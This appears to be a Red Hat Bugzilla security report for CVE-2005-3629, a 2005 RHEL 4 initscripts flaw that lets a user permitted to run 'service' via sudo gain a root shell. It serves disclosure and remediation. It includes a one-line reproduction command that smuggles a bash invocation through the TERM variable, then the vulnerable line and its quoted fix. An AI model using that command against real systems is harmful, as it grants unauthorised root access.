Bug 174849

Summary: CVE-2005-3629 root shell can be gained from service if ran through sudo
Product: Red Hat Enterprise Linux 4 Reporter: Bill Nottingham <notting>
Component: initscriptsAssignee: Bill Nottingham <notting>
Status: CLOSED ERRATA QA Contact: Brock Organ <borgan>
Severity: medium Docs Contact:
Priority: medium    
Version: 4.0CC: poelstra, rvokal, security-response-team
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard: impact=moderate,embargo=yes,reported=20051202,source=bugzilla
Fixed In Version: RHSA-2006-0016 Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2006-03-07 18:23:23 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 174825    
Bug Blocks: 168429    

Description Bill Nottingham 2005-12-02 18:55:13 UTC 
+++ This bug was initially created as a clone of Bug #174825 +++

Description of problem:
By setting one of various environement variables to "valid" but yet "invalid" 
values and then running service through sudo, one can gain a root shell as a 
normal user.

Version-Release number of selected component (if applicable):
7.31.18.EL

How reproducible:
Always

Steps to Reproduce:
1. Run the following command:
    
     TERM=â$TERM /bin/bash âc /bin/bashâ sudo /sbin/service network status

Note the actual service and option for the service really doen't matter.
  
Actual results:
Instant root shell.

Expected results:
No root shell.

Additional info:
The problem, and there may be others is that environment variables when 
expanded in the service script are not quoted.  Here is the particular 
offending line in this case:

   env -i LANG=$LANG PATH=$PATH TERM=$TERM "${SERVICEDIR}/${SERVICE}" ${OPTIONS}

If the vars were quoted as in:

   env -i LANG="$LANG" PATH="$PATH" TERM="$TERM" "${SERVICEDIR}/${SERVICE}" 
${OPTIONS}

then this exploit would not be possible (save maybe with some didling of IFS).

The problem is mitigated by the fact that one has to configure something like 
sudo to allow a user to run service in some fashion, and also in that the 
problem can be side stepped by having the sudo entry run something that runs 
service that properly cleans the environment before execing service.
Comment 2 Bill Nottingham 2005-12-02 20:16:06 UTC 
Fixed in 7.93.23.EL-1.
Comment 6 Josh Bressers 2006-03-07 15:45:06 UTC 
Lifting embargo.
Comment 7 Red Hat Bugzilla 2006-03-07 18:23:23 UTC 
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2006-0016.html